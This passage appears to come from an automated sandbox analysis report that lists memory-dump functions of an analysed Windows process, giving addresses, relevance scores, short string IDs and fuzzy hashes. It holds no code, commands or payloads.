                                                  • Instruction ID: 843437c679f9cee5640b8dc8ae2fb260fede4092bc94e4c2e60170dedba454d9
                                                  • Opcode Fuzzy Hash: 38a08af5f15f151a218e9476ec1f5fc4d78ec3b1ee8a2146da2586877741702d
                                                  • Instruction Fuzzy Hash: B26222317489494FEB88FB689469E7573E2FFA8315B1141B9E01EC72EADE24EC41CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBB0AB Relevance: 4.2, Strings: 3, Instructions: 422COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $_$!
                                                  • API String ID: 0-3494243465
                                                  • Opcode ID: 2b3a3fa82d4271b42ed73cf910b31c264e6c40ed1730131b94cf9e8bbf2832f5
                                                  • Instruction ID: 4dd3ef042bdcbc5884c1c38cedc5ae2db4a39f2f2c4fadd5565954764d8bf1fc
                                                  • Opcode Fuzzy Hash: 2b3a3fa82d4271b42ed73cf910b31c264e6c40ed1730131b94cf9e8bbf2832f5
                                                  • Instruction Fuzzy Hash: 2CF1D531A09A5E8FDB6DDB98C4A06A9B7E1FF14310F54557DD05BC76A2DA38B902CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF06FA Relevance: 2.8, Strings: 2, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: =J_^$J_^
                                                  • API String ID: 0-2620764440
                                                  • Opcode ID: c68d547d625c014d386c974547ca99d729ee11eb37638febe1dc807a0d53877f
                                                  • Instruction ID: a66bfdf5ce0b420bcfc552c0137d348a596a6d346cc170f7c5fac4831a879c63
                                                  • Opcode Fuzzy Hash: c68d547d625c014d386c974547ca99d729ee11eb37638febe1dc807a0d53877f
                                                  • Instruction Fuzzy Hash: 1511C352F0F3DB8AF7755BA518B11FC6E809F15A20F1A06BAD49D861E3EC8C2A444296
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE3B95 Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Ls)$fs)
                                                  • API String ID: 0-2047528907
                                                  • Opcode ID: 2760ba86cdb31d3b59dbc08ed66c4bb4b1c764a1fc53c4f521fd899ebb665b00
                                                  • Instruction ID: 2c4db7d9cb618d16e74dcb157d9b38fa5f09ced3bc250a936698c591e077548a
                                                  • Opcode Fuzzy Hash: 2760ba86cdb31d3b59dbc08ed66c4bb4b1c764a1fc53c4f521fd899ebb665b00
                                                  • Instruction Fuzzy Hash: DB81D970E1961D8EEBA5EB98C8657ADB7F1FF58300F1141BAD00DE72A1DE746A848F40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE18BC Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $/
                                                  • API String ID: 0-2637513485
                                                  • Opcode ID: 88c726318b7977033effe5048f3702956540dd290947e0b2ef5c66129d1b23f8
                                                  • Instruction ID: 32017fb0c30c819c85860eea38f9076cb64cb3b5e92d62ea0749c0f0c2f9f470
                                                  • Opcode Fuzzy Hash: 88c726318b7977033effe5048f3702956540dd290947e0b2ef5c66129d1b23f8
                                                  • Instruction Fuzzy Hash: 1C115170E092AE8EDB35DF90C8547ED77B1AF15300F0545BAC04E6B292DBB82A89DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF01F1 Relevance: 1.7, Strings: 1, Instructions: 442COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: c
                                                  • API String ID: 0-112844655
                                                  • Opcode ID: 54914467a4a92aa3a2310443136ab6181a333e5e24c0edf681e6da3b552dd32d
                                                  • Instruction ID: 71e17ca0810b89dfdea8951c4d12e91c17511158bcacfba9ff42c14326b24033
                                                  • Opcode Fuzzy Hash: 54914467a4a92aa3a2310443136ab6181a333e5e24c0edf681e6da3b552dd32d
                                                  • Instruction Fuzzy Hash: 44D14631B0EA4D8FE7B8DF5888655F83BD0FF58711B0602B9D05EC71B2DE68A9068785
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBF819 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: cA
                                                  • API String ID: 0-2872761854
                                                  • Opcode ID: 7bf954976704dd48adc6faeb4747465f28551d3d319bfc929f9b38a3614affc2
                                                  • Instruction ID: 39530c08afa6fde9ae092b85cfe7082a47f8a7215450b714f5f5363647c4cd06
                                                  • Opcode Fuzzy Hash: 7bf954976704dd48adc6faeb4747465f28551d3d319bfc929f9b38a3614affc2
                                                  • Instruction Fuzzy Hash: 2AC11530A0A6498FEB5DDF68C0A16A477A1FF59320F5551BDD84FCB297CA38E981CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBD207 Relevance: 1.6, Strings: 1, Instructions: 311COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kw
                                                  • API String ID: 0-970843853
                                                  • Opcode ID: b2a9306107d1794f94fd44a261b36239cd607fc2d30ec6ab200fa9e6e0107aae
                                                  • Instruction ID: c38a3bf65ec58ddc00c17c3d284319d69d15efdfbd3cae942feee66c8c522698
                                                  • Opcode Fuzzy Hash: b2a9306107d1794f94fd44a261b36239cd607fc2d30ec6ab200fa9e6e0107aae
                                                  • Instruction Fuzzy Hash: 3E319012F1E0B74AF23DA6E828314F823405F5577AF1956B7E45F8B0E79E0C79418AA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBD277 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kw
                                                  • API String ID: 0-970843853
                                                  • Opcode ID: 28b76b76dd36b8069e022ab865ae8921781df14477458dda8c41f0ce73a10971
                                                  • Instruction ID: 535415f57cc01730b28e886879781673173c5836912f351e499a974857ab1997
                                                  • Opcode Fuzzy Hash: 28b76b76dd36b8069e022ab865ae8921781df14477458dda8c41f0ce73a10971
                                                  • Instruction Fuzzy Hash: 0721A612F0F5FB8AF23D96A928321B82B405F55335F1A12B6D45F8B0F3DE0C79458A91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF3555 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: +g
                                                  • API String ID: 0-1100455182
                                                  • Opcode ID: d3df517aeee7205d96e2cb66bb6357a877bd0891e9edbbe42708c2e71ecc2ba5
                                                  • Instruction ID: a850e48b368861176df4c742d33cf7bfb531387639a064eaf2915430ca9a1b1c
                                                  • Opcode Fuzzy Hash: d3df517aeee7205d96e2cb66bb6357a877bd0891e9edbbe42708c2e71ecc2ba5
                                                  • Instruction Fuzzy Hash: 1AB1B17071A65A8FEB58CF58C0E05F47BA1FF44310B5542BDC85B8B69ACA78F981CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAED1B6 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RJ_H
                                                  • API String ID: 0-2020186138
                                                  • Opcode ID: 26e3a0a6645b75f6770a2a306f91540e9e757e50fbce65356abd8d6e12ffc56b
                                                  • Instruction ID: 92a1ac3965fcd8a945794de3783ae06bafd227da0e6defa000d6490bc079a12e
                                                  • Opcode Fuzzy Hash: 26e3a0a6645b75f6770a2a306f91540e9e757e50fbce65356abd8d6e12ffc56b
                                                  • Instruction Fuzzy Hash: 8D816931B0EB4A8FE3399BA8946107577E0EF95310B16057ED4DEC72A3DE68B9028742
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB16D8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: eaf14b531a2abcad469c0a0649fa4685afe3ec531437b7e899b0b9a63254cc6b
                                                  • Instruction ID: 2821878e914e2b303d67a32c521b205ee8d96d4ddf45e2aca9551572e48c1bfd
                                                  • Opcode Fuzzy Hash: eaf14b531a2abcad469c0a0649fa4685afe3ec531437b7e899b0b9a63254cc6b
                                                  • Instruction Fuzzy Hash: AA517935E1A61E9FDB1CDB98D8A55ACB7B1FF49310F1541BED01AE72A6CA342A01CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF31C8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 54e034d39d929144ce3648b30e17d7f63056d2e3ff31ea19eb675e36bc43501e
                                                  • Instruction ID: d303a0bb68840a4d30eac7426e24e187a9b28d9c7d76f7e09742e2e831609026
                                                  • Opcode Fuzzy Hash: 54e034d39d929144ce3648b30e17d7f63056d2e3ff31ea19eb675e36bc43501e
                                                  • Instruction Fuzzy Hash: 4E515D31F0960E9FEB68DB98C4655FDBBB1FF54300F1141BAD01AEB2A2DA756A05CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB7888 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 7b8d909ad5b8db1d8b881e6e13b9d918a7dbc3628170f213f53db69864d52498
                                                  • Instruction ID: be4207d32d1eb721d1dbc81d538791c29465e52a76683d5805300de22da11b4a
                                                  • Opcode Fuzzy Hash: 7b8d909ad5b8db1d8b881e6e13b9d918a7dbc3628170f213f53db69864d52498
                                                  • Instruction Fuzzy Hash: AA518C31E0965E8FDB5DCBA8C8615ACB7B1FF54310F1141BED01AE7292CA382A01CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEE158 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 244055d9aba6ef808ff78ab71db08684082ef5d3c8a83839605580520ea8e25c
                                                  • Instruction ID: e321a8aead10c879f8af8c0f119b99a0e1d73f61a46db27c2c2b31d5483dcc14
                                                  • Opcode Fuzzy Hash: 244055d9aba6ef808ff78ab71db08684082ef5d3c8a83839605580520ea8e25c
                                                  • Instruction Fuzzy Hash: 84516D71E0954E8FDBA9DB98C4655BDB7B1EF58300F1141BED01AEB2A2CA782A41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEC84A Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S<
                                                  • API String ID: 0-1523115660
                                                  • Opcode ID: c12e500ccd840d3d7f25a93584e25115b99b4c437be0c38c602ecae61dd0070d
                                                  • Instruction ID: 4833b1bf47b51c0dfe5c51f6b5c05757d2bf6b78f8b40a7d028ca0213f7f6742
                                                  • Opcode Fuzzy Hash: c12e500ccd840d3d7f25a93584e25115b99b4c437be0c38c602ecae61dd0070d
                                                  • Instruction Fuzzy Hash: E731E772F0EA4E5FE768A7A898322E877E1EF55350F460179D01DC32D3EE6869018380
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB9E48 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kw
                                                  • API String ID: 0-970843853
                                                  • Opcode ID: d4de807eb7f4c1ca306b7150e2a0b231a803a26db143290f81096b1f08ac766a
                                                  • Instruction ID: 42ab3455ca52565e2a2dee9fc3f0d716a291b2e7f4490571cd41ac9d729ce402
                                                  • Opcode Fuzzy Hash: d4de807eb7f4c1ca306b7150e2a0b231a803a26db143290f81096b1f08ac766a
                                                  • Instruction Fuzzy Hash: 86310E30E1E56FCAEBACEB9484615BD77B1FF44301F511176D01FD31A0CA386A409A81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEB792 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S<
                                                  • API String ID: 0-1523115660
                                                  • Opcode ID: b4da6903d5ef47f645523e0c4f9eba528df96c67496e5435ca353740858d206f
                                                  • Instruction ID: bebdf1687f1a211d52e0c5085ebdd6b4124e122caec9de55ef19488b8058af31
                                                  • Opcode Fuzzy Hash: b4da6903d5ef47f645523e0c4f9eba528df96c67496e5435ca353740858d206f
                                                  • Instruction Fuzzy Hash: 3621F931A1991D8FDFA8DB58C4A5AACB7B1FF6C310F4001AED00EE36A1CE75A9418B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBB36E Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 6fb1a868ca417cb69d1ec91fa57167ef642cb388e5fc38c41aea3be1e397d839
                                                  • Instruction ID: 492dd501bf39761f7ee0e590e78ab1931daa954f5fe9b829919d7c7312499bc2
                                                  • Opcode Fuzzy Hash: 6fb1a868ca417cb69d1ec91fa57167ef642cb388e5fc38c41aea3be1e397d839
                                                  • Instruction Fuzzy Hash: F8316D32E0995E8FEB6CDB98C4656ECB7B0FF54314F5151BAD01AD72A2CA386A01CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB9E70 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kw
                                                  • API String ID: 0-970843853
                                                  • Opcode ID: b2b302e27c9f64ab64fdcd3373cf4523d11ca2dac067d0a4e01fa4d0936e6dc6
                                                  • Instruction ID: c855b3cc6ff55f91b1527d6c625bcda66619ec591bcd2727ee4ca1d51090d604
                                                  • Opcode Fuzzy Hash: b2b302e27c9f64ab64fdcd3373cf4523d11ca2dac067d0a4e01fa4d0936e6dc6
                                                  • Instruction Fuzzy Hash: D501CC12F0F47F8AF23C56D528321BD55005F45370F6622BAE84F8B1F68E0C3A816E92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE1708 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "
                                                  • API String ID: 0-123907689
                                                  • Opcode ID: fcfea6a5e75daf1e8873f813545466003af70597f2617f527dae143c64571cb6
                                                  • Instruction ID: 1e4885857fbb9fa9a0f8e626638e50bad14a82f50338145e2e0f194eec2c6ac3
                                                  • Opcode Fuzzy Hash: fcfea6a5e75daf1e8873f813545466003af70597f2617f527dae143c64571cb6
                                                  • Instruction Fuzzy Hash: 821116B0E0932D8FEB64DF85C8947EDB6B2BF54304F0141B9D04DA6292CBB81A84CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE79E4 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Nr)
                                                  • API String ID: 0-3674143424
                                                  • Opcode ID: b4b4eaa67a4eaffcb07975d54551eb673cb3d323041caf12806060e271c9b0e7
                                                  • Instruction ID: be10db82f2914206ff2b748e3170be3c7e38b32fb0dafdc9351d9cb5de4f011b
                                                  • Opcode Fuzzy Hash: b4b4eaa67a4eaffcb07975d54551eb673cb3d323041caf12806060e271c9b0e7
                                                  • Instruction Fuzzy Hash: CEF08C70D28A4D9FEB50EFA8C849AAA7BF0FF98304F10023AB818D3251DB3069518740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEBD30 Relevance: .7, Instructions: 691COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7c4b7b43e6ca180e22a94e81b50c3f4dae5263b8297d3836b3b1261b0c636a8
                                                  • Instruction ID: b9de3e289c82345e743415e7f8e1c05236261569a6f97e527a1be4aec09d465f
                                                  • Opcode Fuzzy Hash: c7c4b7b43e6ca180e22a94e81b50c3f4dae5263b8297d3836b3b1261b0c636a8
                                                  • Instruction Fuzzy Hash: E032A630B19A1D8FDBA8DB58C8A5AB873E1FF54314F5141B9D01EC72A2DE68ED45CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB3819 Relevance: .4, Instructions: 420COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56b824fd79dba03bb0a945aba4f0bb372dbe40d655c8bde16c411f2c64243056
                                                  • Instruction ID: 8664e0ce5165399fd785f5bdcfeae96ecd69dba7cebdf4db5740788e3de4ccbb
                                                  • Opcode Fuzzy Hash: 56b824fd79dba03bb0a945aba4f0bb372dbe40d655c8bde16c411f2c64243056
                                                  • Instruction Fuzzy Hash: 5FD1F871B0E95E4FE77CEA6888665B437D0EF54330B1512BAD05FC71B2DD18E9068B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB000C Relevance: .4, Instructions: 412COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a7917eaf2c39632745aaec7fa7f6b13f08c37607f98f9d4f1b3010515e8f09dc
                                                  • Instruction ID: fee5a2bcbd54a9238115d69aaf8e6dfab771b1595905f53b1da682a5a84579e8
                                                  • Opcode Fuzzy Hash: a7917eaf2c39632745aaec7fa7f6b13f08c37607f98f9d4f1b3010515e8f09dc
                                                  • Instruction Fuzzy Hash: D2510912B0F6A64FE33A66B968755E82F609F06775B0E01F7D48ACF0E7C80C294587E5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADD8C9 Relevance: .4, Instructions: 394COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14cd3bcab92a73f8e09b790058ccd3767bf7b4aa9315c38956e1287cb74c34da
                                                  • Instruction ID: 6177eb1601c5f8a5be0b0740a1419fb7c982b1aae57e8961242a7f711adde50b
                                                  • Opcode Fuzzy Hash: 14cd3bcab92a73f8e09b790058ccd3767bf7b4aa9315c38956e1287cb74c34da
                                                  • Instruction Fuzzy Hash: 93E14C71E19A5D8FDB68DF98C8A5BBCB7A1FF58304F4042BAD04D972E2CA746941CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBB5D0 Relevance: .4, Instructions: 394COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40c192b00a36605eed3fc6158ccc50423db7f0e162561f975e658d9a143a532a
                                                  • Instruction ID: 0363deffb62b93b4e3d994e5ebed45283dbdb7c29dda204b01901ed75b496cce
                                                  • Opcode Fuzzy Hash: 40c192b00a36605eed3fc6158ccc50423db7f0e162561f975e658d9a143a532a
                                                  • Instruction Fuzzy Hash: 9CB19E30B2D6AA4FF72C9A6884A11B877D0EF49324F2515BDC4DBC75A3D91CB9438B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEE3A9 Relevance: .4, Instructions: 383COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18bda95803377e5c829f42d3e4468da3a0ad735df9246231364e4ab1eee19800
                                                  • Instruction ID: 48716c97928936bb095625bc15de023bcc7924f43a2a6f8c90d9f4b199f33d58
                                                  • Opcode Fuzzy Hash: 18bda95803377e5c829f42d3e4468da3a0ad735df9246231364e4ab1eee19800
                                                  • Instruction Fuzzy Hash: BBE1C23061954A8FEBACCF48C0E05B137A1FF49310B5545BDC84F8B69ADA78F982CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF0645 Relevance: .4, Instructions: 359COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
